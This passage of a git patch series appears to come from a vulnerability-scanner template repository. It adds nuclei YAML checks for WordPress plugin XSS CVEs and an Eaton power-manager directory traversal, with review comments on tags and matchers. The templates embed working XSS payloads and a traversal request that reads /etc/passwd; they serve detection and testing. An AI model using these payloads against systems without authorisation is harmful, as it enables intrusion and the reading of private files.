"" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 2a76b19a36179aafaa3fd8011a424b4a0808f020 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 16 Jul 2021 11:25:24 +0700 Subject: [PATCH 038/132] Create CVE-2017-17059.yaml --- cves/2017/CVE-2017-17059.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2017/CVE-2017-17059.yaml diff --git a/cves/2017/CVE-2017-17059.yaml b/cves/2017/CVE-2017-17059.yaml new file mode 100644 index 0000000000..7fccdaa7b6 --- /dev/null +++ b/cves/2017/CVE-2017-17059.yaml 
@@ -0,0 +1,31 @@ +id: CVE-2017-17059 + +info: + name: amtyThumb posts 8.1.3 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17059 + tags: cve,cve2017,wordpress,xss,wp-plugin + +requests: + - method: POST + path: + - "{{BaseURL}}/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E=1" + + body: "amty_hidden=1" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 5be858f2d633a5793d8dc86f3b1debaf300ebc63 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 16 Jul 2021 11:27:01 +0700 Subject: [PATCH 039/132] Create CVE-2017-17043.yaml --- cves/2017/CVE-2017-17043.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2017/CVE-2017-17043.yaml diff --git a/cves/2017/CVE-2017-17043.yaml b/cves/2017/CVE-2017-17043.yaml new file mode 100644 index 0000000000..7fd40c1e11 --- /dev/null +++ b/cves/2017/CVE-2017-17043.yaml @@ -0,0 +1,29 @@ +id: CVE-2017-17043 + +info: + name: Emag Marketplace Connector 1.0 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17043 + tags: cve,cve2017,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%22%2F%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 03698a57eea5d519df3b045bbd7cbb8e05dd83dc Mon Sep 17 00:00:00 2001 
From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 16 Jul 2021 11:28:40 +0700 Subject: [PATCH 040/132] Create CVE-2017-9288.yaml --- cves/2017/CVE-2017-9288.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2017/CVE-2017-9288.yaml diff --git a/cves/2017/CVE-2017-9288.yaml b/cves/2017/CVE-2017-9288.yaml new file mode 100644 index 0000000000..1b442b3bf6 --- /dev/null +++ b/cves/2017/CVE-2017-9288.yaml @@ -0,0 +1,29 @@ +id: CVE-2017-9288 + +info: + name: Raygun4WP <= 1.8.0 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2017-9288 + tags: cve,cve2017,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 4dfcea3bea7c968c7d81d2f40291b0a2f4ff0302 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 10:28:02 +0530 Subject: [PATCH 041/132] Update node-red-detect.yaml --- technologies/node-red-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/node-red-detect.yaml b/technologies/node-red-detect.yaml index 9db6df3b6f..721bac1466 100644 --- a/technologies/node-red-detect.yaml +++ b/technologies/node-red-detect.yaml @@ -4,7 +4,7 @@ info: name: Node RED Detect author: pikpikcu severity: info - tags: tech,node-red,apache + tags: tech,apache requests: - method: GET From 6dfd64ecc9987848cc7ed411b35ddacb67e5a490 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 16 Jul 2021 04:59:58 +0000 Subject: [PATCH 042/132] Auto Update README [Fri Jul 16 04:59:58 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) 
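Review bot: Dropping `node-red` leaves `tags: tech,apache`, so the template is no longer selectable by its product tag and is grouped under `apache`, which does not describe Node-RED (a Node.js application; its Apache-2.0 licence may be what the tag was meant to capture). Suggest `tags: tech,node-red`, keeping the product tag and removing the licence-derived one.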
diff --git a/README.md b/README.md index b2ebc20708..835bd4293d 100644 --- a/README.md +++ b/README.md @@ -39,12 +39,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | cves | 430 | vulnerabilities | 233 | exposed-panels | 200 | -| takeovers | 70 | exposures | 116 | technologies | 120 | +| takeovers | 70 | exposures | 116 | technologies | 121 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1551 files**. +**128 directories, 1552 files**. From 4287359c29e89a405d5a1ef4ced19b5b0d2edbc8 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 10:30:43 +0530 Subject: [PATCH 043/132] Update CVE-2017-9288.yaml --- cves/2017/CVE-2017-9288.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2017/CVE-2017-9288.yaml b/cves/2017/CVE-2017-9288.yaml index 1b442b3bf6..19bdc03839 100644 --- a/cves/2017/CVE-2017-9288.yaml +++ b/cves/2017/CVE-2017-9288.yaml @@ -4,6 +4,7 @@ info: name: Raygun4WP <= 1.8.0 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: The Raygun4WP plugin 1.8.0 for WordPress is vulnerable to a reflected XSS in sendtesterror.php (backurl parameter). reference: https://nvd.nist.gov/vuln/detail/CVE-2017-9288 tags: cve,cve2017,wordpress,xss,wp-plugin From bf583274fd7c429a0117b7b7617218e610697eff Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 16 Jul 2021 05:05:07 +0000 Subject: [PATCH 044/132] Auto Update README [Fri Jul 16 05:05:07 UTC 2021] :robot: --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 835bd4293d..af2ddb7b77 100644 --- a/README.md +++ b/README.md 
@@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 430 | vulnerabilities | 233 | exposed-panels | 200 | -| takeovers | 70 | exposures | 116 | technologies | 121 | +| cves | 431 | vulnerabilities | 233 | exposed-panels | 200 | +| takeovers | 70 | exposures | 116 | technologies | 122 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1552 files**. +**128 directories, 1554 files**. From e859860aaa3e60bd2e6a5bc6173017efbeae6020 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 16 Jul 2021 05:08:39 +0000 Subject: [PATCH 045/132] Auto Update README [Fri Jul 16 05:08:39 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index af2ddb7b77..437101d33b 100644 --- a/README.md +++ b/README.md @@ -39,12 +39,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | cves | 431 | vulnerabilities | 233 | exposed-panels | 200 | -| takeovers | 70 | exposures | 116 | technologies | 122 | +| takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1554 files**. +**128 directories, 1555 files**. From a7f24729222e69467d3b205505b96db8d074a87e Mon Sep 17 00:00:00 2001 
From: Prince Chaddha Date: Fri, 16 Jul 2021 10:41:33 +0530 Subject: [PATCH 046/132] Update CVE-2017-18536.yaml --- cves/2017/CVE-2017-18536.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2017/CVE-2017-18536.yaml b/cves/2017/CVE-2017-18536.yaml index ea6350dac0..5ac65f849b 100644 --- a/cves/2017/CVE-2017-18536.yaml +++ b/cves/2017/CVE-2017-18536.yaml @@ -4,6 +4,7 @@ info: name: Stop User Enumeration 1.3.5-1.3.7 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: The Stop User Enumeration WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability. reference: https://wpscan.com/vulnerability/956cc5fd-af06-43ac-aa85-46b468c73501 tags: cve,cve2017,wordpress,xss,wp-plugin From f0d1da0d2e15c512a505533438785ff7a2aa482e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 10:43:04 +0530 Subject: [PATCH 047/132] Update CVE-2017-17451.yaml --- cves/2017/CVE-2017-17451.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2017/CVE-2017-17451.yaml b/cves/2017/CVE-2017-17451.yaml index a42dbf3e4b..40a4e59745 100644 --- a/cves/2017/CVE-2017-17451.yaml +++ b/cves/2017/CVE-2017-17451.yaml @@ -4,6 +4,7 @@ info: name: WP Mailster <= 1.5.4 - Unauthenticated Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: The WP Mailster plugin before 1.5.5 for WordPress has XSS in the unsubscribe handler via the mes parameter to view/subscription/unsubscribe2.php. reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17451 tags: cve,cve2017,wordpress,xss,wp-plugin From a5efbf1289a9d7928b998552f2ca161014c5f0a2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 16 Jul 2021 05:13:22 +0000 Subject: [PATCH 048/132] Auto Update README [Fri Jul 16 05:13:22 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 437101d33b..ff56b294ff 100644 --- a/README.md +++ b/README.md 
@@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 431 | vulnerabilities | 233 | exposed-panels | 200 | +| cves | 432 | vulnerabilities | 233 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1555 files**. +**128 directories, 1556 files**. From be7247bc77c743ce064323a3e5cfad1b3d10898f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 10:44:57 +0530 Subject: [PATCH 049/132] Update CVE-2017-17059.yaml --- cves/2017/CVE-2017-17059.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/cves/2017/CVE-2017-17059.yaml b/cves/2017/CVE-2017-17059.yaml index 7fccdaa7b6..ecf71fafc7 100644 --- a/cves/2017/CVE-2017-17059.yaml +++ b/cves/2017/CVE-2017-17059.yaml @@ -4,7 +4,10 @@ info: name: amtyThumb posts 8.1.3 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17059 + description: XSS exists in the amtyThumb amty-thumb-recent-post (aka amtyThumb posts or wp-thumb-post) plugin 8.1.3 for WordPress via the query string to amtyThumbPostsAdminPg.php. + reference: | + - https://github.com/NaturalIntelligence/wp-thumb-post/issues/1 + - https://nvd.nist.gov/vuln/detail/CVE-2017-17059 tags: cve,cve2017,wordpress,xss,wp-plugin requests: From 71e397625c682e82c103df281566d5c116565532 Mon Sep 17 00:00:00 2001 
From: GitHub Action Date: Fri, 16 Jul 2021 05:19:51 +0000 Subject: [PATCH 050/132] Auto Update README [Fri Jul 16 05:19:51 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index ff56b294ff..71de9e5dcd 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 432 | vulnerabilities | 233 | exposed-panels | 200 | +| cves | 434 | vulnerabilities | 233 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1556 files**. +**128 directories, 1558 files**. From a047cd77ffc21f2f9c5d61bb05851681461cdbe6 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 10:50:55 +0530 Subject: [PATCH 051/132] Update CVE-2017-17043.yaml --- cves/2017/CVE-2017-17043.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2017/CVE-2017-17043.yaml b/cves/2017/CVE-2017-17043.yaml index 7fd40c1e11..3d321b4c8f 100644 --- a/cves/2017/CVE-2017-17043.yaml +++ b/cves/2017/CVE-2017-17043.yaml @@ -4,6 +4,7 @@ info: name: Emag Marketplace Connector 1.0 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: The Emag Marketplace Connector plugin 1.0.0 for WordPress has reflected XSS because the parameter "post" to /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php is not filtered correctly. reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17043 tags: cve,cve2017,wordpress,xss,wp-plugin 
From a78e6caafcff2a11bbcefd2970238a92458791a7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 10:57:50 +0530 Subject: [PATCH 052/132] Update CVE-2019-16332.yaml --- cves/2019/CVE-2019-16332.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2019/CVE-2019-16332.yaml b/cves/2019/CVE-2019-16332.yaml index fa833c4377..f067dd1e34 100644 --- a/cves/2019/CVE-2019-16332.yaml +++ b/cves/2019/CVE-2019-16332.yaml @@ -4,6 +4,7 @@ info: name: API Bearer Auth <= 20181229 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: In the api-bearer-auth plugin before 20190907 for WordPress, the server parameter is not correctly filtered in the swagger-config.yaml.php file, and it is possible to inject JavaScript code, aka XSS. reference: https://nvd.nist.gov/vuln/detail/CVE-2019-16332 tags: cve,cve2019,wordpress,xss,wp-plugin From a08eed7ce80312cf2d119dfa75b493b1c1259f1f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 11:00:01 +0530 Subject: [PATCH 053/132] Update CVE-2019-15713.yaml --- cves/2019/CVE-2019-15713.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-15713.yaml b/cves/2019/CVE-2019-15713.yaml index 405bd13a64..55c9e48f5d 100644 --- a/cves/2019/CVE-2019-15713.yaml +++ b/cves/2019/CVE-2019-15713.yaml @@ -4,7 +4,10 @@ info: name: My Calendar <= 3.1.9 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: https://nvd.nist.gov/vuln/detail/CVE-2019-15713 + description: Triggered via unescaped usage of URL parameters in multiple locations presented in the public view of a site. + reference: | + - https://wpscan.com/vulnerability/9267 + - https://nvd.nist.gov/vuln/detail/CVE-2019-15713 tags: cve,cve2019,wordpress,xss,wp-plugin requests: From b7357ba87137e6442972254311396e32a58da0b6 Mon Sep 17 00:00:00 2001 
From: GitHub Action Date: Fri, 16 Jul 2021 05:30:52 +0000 Subject: [PATCH 054/132] Auto Update README [Fri Jul 16 05:30:52 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 71de9e5dcd..7509741656 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 434 | vulnerabilities | 233 | exposed-panels | 200 | +| cves | 435 | vulnerabilities | 233 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1558 files**. +**128 directories, 1559 files**. From da4b0d4da78c5db9335f856fc84de711a03f0412 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 11:01:29 +0530 Subject: [PATCH 055/132] Update CVE-2018-20462.yaml --- cves/2018/CVE-2018-20462.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2018/CVE-2018-20462.yaml b/cves/2018/CVE-2018-20462.yaml index e136ee5786..79a0cbd39f 100644 --- a/cves/2018/CVE-2018-20462.yaml +++ b/cves/2018/CVE-2018-20462.yaml @@ -4,6 +4,7 @@ info: name: JSmol2WP <= 1.07 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: An issue was discovered in the JSmol2WP plugin 1.07 for WordPress. A cross-site scripting (XSS) vulnerability allows remote attackers to inject arbitrary web script or HTML via the jsmol.php data parameter. reference: https://nvd.nist.gov/vuln/detail/CVE-2018-20462 tags: cve,cve2018,wordpress,xss,wp-plugin From a1ccf71bede31e207381362b1b008f1b24bc9ac6 Mon Sep 17 00:00:00 2001 
From: GitHub Action Date: Fri, 16 Jul 2021 05:33:01 +0000 Subject: [PATCH 056/132] Auto Update README [Fri Jul 16 05:33:01 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 7509741656..13cd0e31bd 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 435 | vulnerabilities | 233 | exposed-panels | 200 | +| cves | 437 | vulnerabilities | 233 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1559 files**. +**128 directories, 1561 files**. From f977df559c27e75c3d4da4b08abe23b38aafbd42 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 11:05:11 +0530 Subject: [PATCH 057/132] Update CVE-2018-11709.yaml --- cves/2018/CVE-2018-11709.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2018/CVE-2018-11709.yaml b/cves/2018/CVE-2018-11709.yaml index e78227f474..4f305a6330 100644 --- a/cves/2018/CVE-2018-11709.yaml +++ b/cves/2018/CVE-2018-11709.yaml @@ -4,6 +4,7 @@ info: name: wpForo Forum <= 1.4.11 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: wpforo_get_request_uri in wpf-includes/functions.php in the wpForo Forum plugin before 1.4.12 for WordPress allows Unauthenticated Reflected Cross-Site Scripting (XSS) via the URI. reference: https://nvd.nist.gov/vuln/detail/CVE-2018-11709 tags: cve,cve2018,wordpress,xss,wp-plugin From 222ff1b14336d66e0791d412ae26b642c931a4fe Mon Sep 17 00:00:00 2001 
From: GitHub Action Date: Fri, 16 Jul 2021 05:38:12 +0000 Subject: [PATCH 058/132] Auto Update README [Fri Jul 16 05:38:12 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 13cd0e31bd..7663833b39 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 437 | vulnerabilities | 233 | exposed-panels | 200 | +| cves | 440 | vulnerabilities | 233 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1561 files**. +**128 directories, 1564 files**. From 0c4a223fa0a19d54ed25bf9a758f39976db198f5 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 11:13:17 +0530 Subject: [PATCH 059/132] Update CVE-2016-10960.yaml --- cves/2016/CVE-2016-10960.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/cves/2016/CVE-2016-10960.yaml b/cves/2016/CVE-2016-10960.yaml index 3110e9b2eb..2894158ab8 100644 --- a/cves/2016/CVE-2016-10960.yaml +++ b/cves/2016/CVE-2016-10960.yaml 
@@ -5,7 +5,10 @@ info: author: daffainfo severity: critical description: The wsecure plugin before 2.4 for WordPress has remote code execution via shell metacharacters in the wsecure-config.php publish parameter. - reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960 + reference: | + - https://www.pluginvulnerabilities.com/2016/07/12/remote-code-execution-rce-vulnerability-in-wsecure-lite/ + - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wsecure-lite-remote-code-execution-2-3/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960 tags: cve,cve2016,wordpress,wp-plugin,rce requests: From 6aef9702587db6fb0cb5cda23e419adae82fc206 Mon Sep 17 00:00:00 2001 From: Regala Date: Fri, 16 Jul 2021 12:19:30 +0100 Subject: [PATCH 060/132] Update CVE-2020-17362.yaml Added "nova-lite" matcher; massively reduce false positives. --- cves/2020/CVE-2020-17362.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2020/CVE-2020-17362.yaml b/cves/2020/CVE-2020-17362.yaml index 2e265da33c..0fdc277777 100644 --- a/cves/2020/CVE-2020-17362.yaml +++ b/cves/2020/CVE-2020-17362.yaml @@ -20,6 +20,11 @@ requests: - "" part: body + - type: word + words: + - "nova-lite" + part: body + - type: word part: header words: From 90776cea1c4b9154f0428c009b7400b8ca2efd53 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 16 Jul 2021 18:52:12 +0700 Subject: [PATCH 061/132] Create CVE-2020-14461.yaml --- cves/2020/CVE-2020-14461.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 cves/2020/CVE-2020-14461.yaml diff --git a/cves/2020/CVE-2020-14461.yaml b/cves/2020/CVE-2020-14461.yaml new file mode 100644 index 0000000000..748517d9db --- /dev/null +++ b/cves/2020/CVE-2020-14461.yaml 
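Review bot: `reference: |` turns the three URLs into one literal string whose lines merely start with `- `, not into a YAML sequence, so any tooling that reads `reference` as a list (link validation, de-duplication, rendering) sees a single multi-line scalar. If the template schema accepts a list here, `reference:` followed by indented `- https://...` items carries the same data structurally and keeps it greppable per URL. The same block-scalar form is introduced later in this series in the CVE-2020-14461, CVE-2019-20085 and CVE-2019-12616 templates.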
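Review bot: The new `nova-lite` word matcher only narrows results if this template combines its matchers with `matchers-condition: and`; that key sits above the hunk, so it cannot be confirmed here, and with the default (`or`) an extra matcher widens the match rather than reducing false positives as the commit message intends. Worth a one-line check of the lines above before merging; a short comment such as `# requires matchers-condition: and — body reflection alone is too generic` next to the new matcher would record the dependency.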
@@ -0,0 +1,26 @@ +id: CVE-2020-14461 + +info: + name: Eaton Intelligent Power Manager 1.6 - Directory Traversal + author: daffainfo + severity: high + reference: | + - https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion + - https://nvd.nist.gov/vuln/detail/CVE-2020-14461 + - https://www.exploit-db.com/exploits/48614 + tags: cve,cve2020,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[0*]:0:0" + part: body + - type: status + status: + - 200 From 134031c9aa06bbd3b26de0e16cba1c1527dad1e2 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 16 Jul 2021 18:56:28 +0700 Subject: [PATCH 062/132] Update and rename cves/2020/CVE-2020-14461.yaml to cves/2018/CVE-2018-12031.yaml --- cves/{2020/CVE-2020-14461.yaml => 2018/CVE-2018-12031.yaml} | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) rename cves/{2020/CVE-2020-14461.yaml => 2018/CVE-2018-12031.yaml} (86%) diff --git a/cves/2020/CVE-2020-14461.yaml b/cves/2018/CVE-2018-12031.yaml similarity index 86% rename from cves/2020/CVE-2020-14461.yaml rename to cves/2018/CVE-2018-12031.yaml index 748517d9db..234cdfb650 100644 --- a/cves/2020/CVE-2020-14461.yaml +++ b/cves/2018/CVE-2018-12031.yaml @@ -1,4 +1,4 @@ -id: CVE-2020-14461 +id: CVE-2018-12031 info: name: Eaton Intelligent Power Manager 1.6 - Directory Traversal @@ -6,9 +6,9 @@ info: severity: high reference: | - https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion - - https://nvd.nist.gov/vuln/detail/CVE-2020-14461 + - https://nvd.nist.gov/vuln/detail/CVE-2018-12031 - https://www.exploit-db.com/exploits/48614 - tags: cve,cve2020,lfi + tags: cve,cve2018,lfi requests: - method: GET From 049d63066580360ed4c803fc7b153a6cbc2798b6 Mon Sep 17 00:00:00 2001 
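Review bot: The passwd regex `root:[0*]:0:0` accepts only `0` or `*` in the password field, so the usual shadowed form `root:x:0:0` does not match and a successful file read goes unreported; the Linksys template later in this series (CVE-2009-1558) uses `root:[x*]:0:0`, which is the form to align on here: `- "root:[x*]:0:0"`. The same pattern is carried forward unchanged into the CVE-2018-12031 update that adds the win.ini path, so both places need the fix.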
From: GitHub Action Date: Fri, 16 Jul 2021 11:57:56 +0000 Subject: [PATCH 063/132] Auto Update README [Fri Jul 16 11:57:56 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 7663833b39..01cd40a7af 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 440 | vulnerabilities | 233 | exposed-panels | 200 | +| cves | 440 | vulnerabilities | 234 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1564 files**. +**128 directories, 1565 files**. From f4f05394e1b55aa02f76b4d009b1978a6007e6de Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 17:30:35 +0530 Subject: [PATCH 064/132] Update CVE-2020-35713.yaml --- cves/2020/CVE-2020-35713.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-35713.yaml b/cves/2020/CVE-2020-35713.yaml index 7e3e77e0b3..d65d7e96c6 100644 --- a/cves/2020/CVE-2020-35713.yaml +++ b/cves/2020/CVE-2020-35713.yaml @@ -6,7 +6,7 @@ info: severity: critical reference: https://resolverblog.blogspot.com/2020/07/linksys-re6500-unauthenticated-rce-full.html description: Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters to the goform/setSysAdm page. - tags: cve,cve2020,linksys,rce,oob + tags: cve,cve2020,linksys,rce,oob,router requests: - raw: From 7a1f0e6f07b644e711ee8b4caebfe1dba23fbe6b Mon Sep 17 00:00:00 2001 
